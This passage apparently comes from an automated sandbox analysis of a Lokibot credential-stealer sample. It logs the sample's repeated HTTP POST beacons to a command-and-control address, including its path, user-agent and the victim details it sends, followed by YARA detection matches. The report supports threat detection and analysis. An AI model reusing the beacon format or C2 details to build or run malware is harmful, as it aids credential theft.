Jan 11, 2025 07:46:09.033339024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:09.755974054 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50094	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:09.905754089 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:09.910608053 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:10.621844053 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50095	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:10.792256117 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:10.798043966 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:11.520802021 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50096	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:11.685985088 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:11.690984964 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:12.414182901 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50097	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:12.558747053 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:12.563647032 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:13.286118984 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	50098	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:13.432965040 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:13.437851906 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:14.163225889 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50099	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:14.305083990 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:14.311717033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:15.039928913 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50100	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:15.191468000 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:15.196450949 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:15.899775028 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50101	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:16.062007904 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:16.066977024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:16.788527966 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50102	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:16.941674948 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:16.947180033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:17.639245987 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50103	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:17.791002989 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:17.795814037 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:18.635993958 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	50104	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:18.791034937 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:18.795869112 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:19.502355099 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	50105	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:19.672302961 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:19.678030014 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:20.387223005 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	50106	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:20.540424109 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:20.545406103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:21.299537897 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	50107	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:21.445941925 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:21.450793982 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:22.344794035 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	50108	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:22.493406057 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:22.498284101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:23.228400946 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	50109	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:23.366950035 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:23.372577906 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:24.078866959 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	50110	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:24.215676069 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:24.220617056 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:24.943252087 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	50111	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:25.090544939 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:25.095419884 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:25.811788082 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	50112	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:25.953727007 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:25.958652973 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:26.689274073 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Target ID:	0
Start time:	01:44:20
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\YvVDV4cbjy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YvVDV4cbjy.exe"
Imagebase:	0xc10000
File size:	539'648 bytes
MD5 hash:	DE71DA3A473F5CDB285D30A1D6DD333B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 